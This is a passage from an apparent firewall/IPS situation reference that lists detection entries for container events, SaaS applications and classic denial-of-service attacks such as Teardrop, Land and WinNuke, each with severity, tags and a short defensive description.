Last changed: sgpkg-ips-1531-5242
Description: The firewall has failed to start a container
Back to top

DOCKMAN-container-healthcheck failed

About this situation: A containers health check failed.
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The firewall detected a failed run in a containers health check.
Back to top

DOCKMAN-container-started

About this situation: A container has been started
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The firewall has started a container
Back to top

DOCKMAN-container-stopped

About this situation: A container has been stopped
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The firewall has stopped a container
Back to top

DOCKMAN-registry-logged-in

About this situation: A registry has been logged into
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The firewall has logged in to a container registry
Back to top

DOCKMAN-registry-login-failed

About this situation: A registry login failed
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The firewall has failed logging into a registry
Back to top

DOCKMAN-registry-pulled

About this situation: A registry has been pulled
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The firewall has pulled from a container registry
Back to top

DOCKMAN-ztna-failed

About this situation: A ZTNA connector container failed to start
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The firewall failed to start a ZTNA container
Back to top

DOCKMAN-ztna-server-queried

About this situation: ZTNA configuration queried
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The firewall has queried the ZTNA server for container parameters
Back to top

DOCKMAN-ztna-started

About this situation: A ZTNA connector container has been started
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The firewall has started a ZTNA connector container
Back to top

DOCKMAN-ztna-stopped

About this situation: A ZTNA connector container was stopped
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The firewall stopped a ZTNA connector container
Back to top

DOCKMAN-ztna-updated

About this situation: A ZTNA connector container was updated
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-1495-5242
Last changed: sgpkg-ips-1531-5242
Description: The firewall updated a ZTNA connector container
Back to top

Docracy

About this situation: Docracy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Docracy is the web's only open collection of legal contracts and the best way to negotiate and sign documents online.
Back to top

docSTAR

About this situation: Application docSTAR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: docStar - document management software systems and workflow solutions
Back to top

DocStoc

About this situation: DocStoc usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1086-5242
Description: Docstoc is an online community and marketplace to find and share professional documents.
Back to top

Document-Viewing-and-Conversion-Applications-and-SDKs

About this situation: Application Document-Viewing-and-Conversion-Applications-and-SDKs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VirtualViewer High-Speed Document and Image Viewer makes it easy to share content via an off-the-shelf document and image viewer that provides secure high-speed access across the enterprise.
Back to top

Documentree

About this situation: DocumenTree usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: DocumenTree allows businesses to share files and collaborate over the internet with clients, vendors and employees through any internet browser. The online storage service provides a secure internet browser-based virtual office where you can upload, download, browse, search, index, categorize, version, approve, track and discuss documents. There is no document management software(dms) to buy, download, install, or maintain as the subscription service is delivered entirely through a web browser; even on a Personal Digital Assistant(PDA). Companies seeking to extend the mobility of their workforce, as well as tighten client and vendor document exchanges, benefit from the simplified model that delivers always-on availability, without the hardware, software or maintenance costs normally associated with an in-house server installation.
Back to top

Docupace

About this situation: Application Docupace detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Docupace provides a secure and compliant electronic processing platform for financial institutions and health management firms
Back to top

Docurated

About this situation: Application Docurated detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Docurated offers the fastest and simplest way to find and use content - wherever it is stored. With Docurated's smart approach to document management, customers drive more economic value out of existing storage investments. It's the end of files, folders and document tagging. Docurated enables users to instantly find and use the exact and most relevant page, paragraph, slide and chart without opening a single folder or file.
Back to top

Docusign

About this situation: DocuSign usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This technology facilitates the exchange of contracts, tax documents and legal materials. It includes features such as authentication services, user identity management, and workflow automation. Source: Wikipedia
Back to top

DocuVantage

About this situation: Application DocuVantage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Document Advantage Corporation - electronic document management and business process management solution that help your organization capture, convert, distribute, store, and manage your documents and data.
Back to top

DocuWare

About this situation: Application DocuWare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DocuWare - digital document management system. Industries using this technology include health care, financial services, local government, transportation and manufacturing.
Back to top

DocuXplorer

About this situation: Application DocuXplorer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DocuXplorer's document management system offers comprehensive and customizable desktop software and web based solution for securely and affordably managing your documents.
Back to top

Docverify

About this situation: DocVerify usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: DocVerify supports many popular file types, including PDFs, Microsoft Office files, Adobe documents, images, and more for E-signature and doc verification.
Back to top

Doit.im

About this situation: Application Doit.im detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Doit.im is a cross-platform online GTD (Getting Things Done) service.
Back to top

Dokmee

About this situation: Application Dokmee detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dokmee is a secure document management system for efficient document capture and storage, search and retrieval, and file sharing.
Back to top

DokuWiki

About this situation: Application DokuWiki detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DokuWiki is a wiki application licensed under GPL 2 and written in the PHP programming language.
Back to top

DollyDrive

About this situation: Application DollyDrive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dolly Drive provides online backup, Sync and Space for Apple Users.
Back to top

Domain

About this situation: Application Domain detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Domain.com lets you register a domain name and transfer domains, provides reliable web hosting and VPS. powerful website, blog, and ecommerce tools.
Back to top

Domain-Factory

About this situation: Application Domain-Factory detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: domainFACTORY provides full range of hosting services for business and private, from the registration of domains on hosting packages to Server Solutions.
Back to top

DomainsNext

About this situation: Application DomainsNext detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DomainsNext is domain name registration service
Back to top

DomainTools

About this situation: Application DomainTools detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DomainTools provides DNS research tools that use a database of domain name, IP address, and WHOIS data.
Back to top

Dome9

About this situation: Application Dome9 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dome9 is the cloud firewall management service.
Back to top

Domeny

About this situation: Application Domeny detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Domeny is a domain registration company.
Back to top

Dominion-Dealer

About this situation: Application Dominion-Dealer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dominion Dealer Solutions is the trusted provider of auto dealer products and services
Back to top

DoneSafe

About this situation: Application DoneSafe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Donesafe is a cloud safety platform, helping organisations comply with legislation and enhancing their safety culture.
Back to top

DonorDrive

About this situation: Application DonorDrive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DonorDrive is online peer-to-peer fundraising software that increases giving for walks, runs, endurance events, virtual events, ticketed events, and capital campaigns.
Back to top

DonorPerfect-Fundraising-Software

About this situation: Application DonorPerfect-Fundraising-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DonorPerfect is all-in-one software solution to manage fundraising activities and donor management. DonorPerfect Online organizes all of your constituent data for you in one unified database.
Back to top

Doodle

About this situation: Application Doodle detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Doodle is an Internet calendar tool for time management, and coordinating meetings.
Back to top

Doof

About this situation: doof usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A gaming website that supports both online and offline gaming
Back to top

Doolphy

About this situation: Application Doolphy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Doolphy - Online Project Management Software, helps you to plan, share and control your projects and tasks.
Back to top

Doshow

About this situation: Doshow usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-630-5211
Description: Doshow is a Chinese instant messaging application which allows users to communicate with each other in real time.
Back to top

DOS_1234

About this situation: Targa2 DoS: 1234 attack
Context: Non-ratebased DoS attacks
Severity: 6
Tags: Invalid Packet Attacks
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-513-5211
Vulnerability: IP-ICMP-1234.c-DoS
Description: Detected a Denial-of-Service attack from Targa2 attack set. The attack is called 1234, apparently according to IP identifier typically used in the fragments. 1234 attack randomizes source IP address and therefore actual source of the attack cannot be determined from the log event. Risk analysis: Risk level is medium. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

DOS_BONK

About this situation: Targa2 DoS: bonk attack
Context: Non-ratebased DoS attacks
Severity: 6
Tags: Invalid Packet Attacks
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-513-5211
Vulnerability: IP-Bonk-IP-Fragmentation-Denial-Of-Service
Description: Detected a Denial-of-Service attack from Targa2 attack set. The attack is called bonk. Bonk is a variation of well-known Teardrop attack. bonk attack randomizes source IP address and therefore actual source of the attack cannot be determined from the log event. Risk analysis: Risk level is medium. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

DOS_HTTP-Slow-Headers

About this situation: HTTP client is sending request headers slowly.
Context: Engine situations
Severity: 6
Tags: NGFW
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: The HTTP client is sending request headers slowly. This may indicate a denial of service attack in the style of the Slowloris attack tool against the HTTP server.
Back to top

DOS_HTTP-Slow-POST

About this situation: Client is sending HTTP POST data slowly.
Context: Engine situations
Severity: 6
Tags: NGFW
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: The client is sending HTTP POST data slowly. This may indicate a denial-of-service attack against the web server, where the client(s) aim to keep connections open as long as possible to exhaust the resources of the web server by sending data slowly. This situation can also occur when, for example due to network problems, the client is seen to send data very slowly.
Back to top

DOS_JOLT

About this situation: Targa2 DoS: Jolt attack
Context: Non-ratebased DoS attacks
Severity: 6
Tags: Invalid Packet Attacks
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-513-5211
Vulnerability: ICMP-DoS-Jolt-Vulnerability
ICMP-DoS-ZyXEL-Jolt-Vulnerability
IP-Cisco-Malformed-Packet-IP-Phone-Crash
Description: Detected a Denial-of-Service attack from Targa2 attack set. Jolt attack send fragments that cannot be correctly reassembled. Jolt causes IP fragment reassembly code on affected systems to freeze. Jolt attack randomizes source IP address and therefore actual source of the attack cannot be determined from the log event. Risk analysis: Risk level is medium. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

DOS_LAND

About this situation: Targa2 DoS: land attack
Context: Non-ratebased DoS attacks
Severity: 6
Tags: Invalid Packet Attacks
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-513-5211
Vulnerability: IP-Land-DoS
Windows_Xp_2003_Land_Attack_DoS
IPv6-Land-DoS
IP-Land-DoS-Linksys
IP-Land-DoS-Motorola
IP-Land-DoS-Cisco-Catalyst
IP-Land-DoS-Scientific-Atlanta-Cable-Modem
IP-Land-DoS-Westell-Versalink
Description: Detected a Denial-of-Service attack from Targa2 attack set. Land attack send TCP SYN with source IP address set to the same address than target IP address. Because source IP address is spoofed to be the same as destination IP address, it is typically not possible to identify source of the attack from the log event. Risk analysis: Risk level is medium. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

DOS_LINUX_ICMP

About this situation: Linux kernel ICMP packet handling vulnerability
Context: Non-ratebased DoS attacks
Severity: 6
Tags: Invalid Packet Attacks
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-513-5211
Description: Detected an ICMP Denial-of-Service attack against ICMP handling in Linux kernel 2.6.13 - 2.6.15.2. Source IP address of the attack is likely to be spoofed and therefore actual source of the attack usually cannot be determined from the log event. Risk analysis: Risk level is medium. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

DOS_NESTEA

About this situation: Targa2 DoS: nestea attack
Context: Non-ratebased DoS attacks
Severity: 6
Tags: Invalid Packet Attacks
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-513-5211
Vulnerability: IP-Nestea-IP-Fragmentation-Denial-Of-Service
Description: Detected a Denial-of-Service attack from Targa2 attack set. The attack is called nestea. Nestea is a variation of well-known Teardrop attack. Nestea is effective against Linux versions 2.0 and 2.1. Nestea attack randomizes source IP address and therefore actual source of the attack cannot be determined from the log event. Risk analysis: Risk level is medium. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

DOS_NEWTEAR

About this situation: Targa2 DoS: newtear attack
Context: Non-ratebased DoS attacks
Severity: 6
Tags: Invalid Packet Attacks
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-513-5211
Vulnerability: IP-Newtear-IP-Fragmentation-Denial-Of-Service
Description: Detected a Denial-of-Service attack from Targa2 attack set. The attack is called newtear. Newtear is a variation of well-known Teardrop attack. Newtear is effective against Windows NT 4.0 and Windows 95. Newtear attack randomizes source IP address and therefore actual source of the attack cannot be determined from the log event. Risk analysis: Risk level is medium. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

DOS_OSHARE

About this situation: Targa2 DoS: oshare attack
Context: Non-ratebased DoS attacks
Severity: 6
Tags: Invalid Packet Attacks
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-513-5211
Vulnerability: IP-Oshare-Bogus-IP-Fragmentation-DoS
Description: Detected a Denial-of-Service attack from Targa2 attack set. The attack is called oshare. oshare attack sends illegal IP fragments that cause denial-of-service against some implementations of IP reassembly. oshare attack is effective against unpatched Windows 98 hosts. oshare attack randomizes source IP address and therefore actual source of the attack cannot be determined from the log event. Risk analysis: Risk level is medium. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

DOS_RST-Flood-Finished

About this situation: An end of RST flood through the engine was detected
Context: Engine situations
Severity: 6
Tags: NGFW
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1531-5242
Description: Egnine detected that forged RST flood through it was finished. A matching 'RST-Flood-Started' situation was generated when the flood started.
Back to top

DOS_RST-Flood-Started

About this situation: RST flood through the engine was detected
Context: Engine situations
Severity: 6
Tags: NGFW
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1531-5242
Description: Engine detected forged RST flood through it. A matching 'RST-Flood-Finished' situation is generated when the end of the flood is detected.
Back to top

DOS_SAIHYOUSEN

About this situation: Targa2 DoS: Saihyousen attack
Context: Non-ratebased DoS attacks
Severity: 6
Tags: Invalid Packet Attacks
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-513-5211
Vulnerability: IP-UDP-Saihyousen-Denial-Of-Service
Description: Detected a Denial-of-Service attack from Targa2 attack set. The attack is called Saihyousen. Saihyousen attack sends malformed UDP datagrams. Saihyousen attack spoofs source IP address and therefore actual source of the attack cannot be determined from the log event. Risk analysis: Risk level is medium. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

DOS_SYN-Flood-Finished

About this situation: An end to SYN flood to a target was detected
Context: Engine situations
Severity: 6
Tags: NGFW
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: Egnine detected that SYN flood to the given target was finished. A matching 'SYN-Flood-Started' situation was generated when the flood started.
Back to top

DOS_SYN-Flood-In-Progress

About this situation: Status report on ongoing SYN flood to reported target
Context: Engine situations
Severity: 6
Tags: NGFW
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Egnine detected that SYN flood to the given target still continues. A matching 'SYN-Flood-Started' situation was generated when the flood started, in the end 'SYN-Flood-Finished' situation will be generated.
Back to top

DOS_SYN-Flood-Started

About this situation: SYN flood to a target was detected
Context: Engine situations
Severity: 6
Tags: NGFW, SSM Attacks
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: Egnine detected SYN flood to the given target. A matching 'SYN-Flood-Finished' situation is generated when flood end is detected.
Back to top

DOS_SYN-Flood-Untrackable

About this situation: Status report on untracked SYN flood activity
Context: Engine situations
Severity: 6
Tags: NGFW
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Report on recent SYN flood activity that cannot be tracked per target due to lack of resources. This situation is generated periodically while the stiuation persists
Back to top

DOS_SYNDROP

About this situation: Targa2 DoS: syndrop attack
Context: Non-ratebased DoS attacks
Severity: 6
Tags: Invalid Packet Attacks
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-513-5211
Description: Detected a Denial-of-Service attack from Targa2 attack set. The attack is called syndrop. Syndrop attack sends illegally overlapping fragments and causes problems with some implementation of IP reassembly code. Unpatched Windows NT 4.0 and Windows 95 are amongst the affected systems. syndrop attack randomizes source IP address and therefore actual source of the attack cannot be determined from the log event. Risk analysis: Risk level is medium. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

DOS_TCP-Finished

About this situation: DoS attack activity against this target ended
Context: TCP DoS events
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-371-4219
Description: Synflooding activity against the host has ceased and the TCP synflood mitigation has ended.
Back to top

DOS_TCP_SynAck_Started

About this situation: TCP synflood DoS attack activity detected (SYN-ACK timeout method)
Context: TCP synflood detection (SYN-ACK timeout based detection)
Severity: 6
Tags: Inspection
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-371-4219
Description: TCP synflood attack detected (SYN-ACK timeout method).
Back to top

DOS_TEARDROP

About this situation: Targa2 DoS: Teardrop attack
Context: Non-ratebased DoS attacks
Severity: 6
Tags: Invalid Packet Attacks
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-513-5211
Vulnerability: IP-Teardrop-DoS
Description: Detected teardrop Denial-of-Service attack. Teardrop attack produces specially crafted IP fragments that cause certain IP reassembly implementations to crash. Teardrop attack randomizes source IP address and therefore actual source of the attack cannot be determined from the log event. Risk analysis: Risk level is medium. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

DOS_UDP-Finished

About this situation: DoS attack activity against this target ended
Context: UDP DoS events
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-371-4219
Description: DoS activity against the host has ceased and the UDP DoS mitigation has ended.
Back to top

DOS_UDP_Started

About this situation: UDP DoS attack activity detected
Context: UDP DoS detected
Severity: 6
Tags: Inspection
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-371-4219
Description: UDP DoS attack activity detected.
Back to top

DOS_WINNUKE

About this situation: Targa2 DoS: winnuke attack
Context: Non-ratebased DoS attacks
Severity: 6
Tags: General Packet Validation Situations
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-371-4219
Vulnerability: WinNuke-DoS
Description: Detected a Denial-of-Service attack from Targa2 attack set. The attack is called winnuke. Winnuke attack establishes TCP connection to port 139 in target host and sends TCP segment with urgent pointer set to the port. Some host, most notably unpatched Windows 95, are unable to handle urgent data sent to that port and shall freeze. Because winnuke requires a full TCP handshake, spoofing source IP address is significantly harder with winnuke than most other DoS attacks. Risk analysis: Risk level is medium. Most relevant log fields: "IP Source" for IP address of the attacker. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

DotCloud

About this situation: Application DotCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: dotCloud is the application Platform which enables developers to deploy, manage and scale their applications. It supports all languages including PHP, Python, Ruby, Java, Nodejs, Perl and any other through custom services.
Back to top

Dotcom-Monitor

About this situation: Application Dotcom-Monitor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dotcom-Monitor - web monitoring services to constantly improve your server uptime, page speed, and web application functionality.
Back to top

Dotloop

About this situation: Application Dotloop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Dotloop provides online software that handles real estate transactions from offer to close.
Back to top

DotNetNuke

About this situation: Application DotNetNuke detected
Context: Application Context
Severity: 1
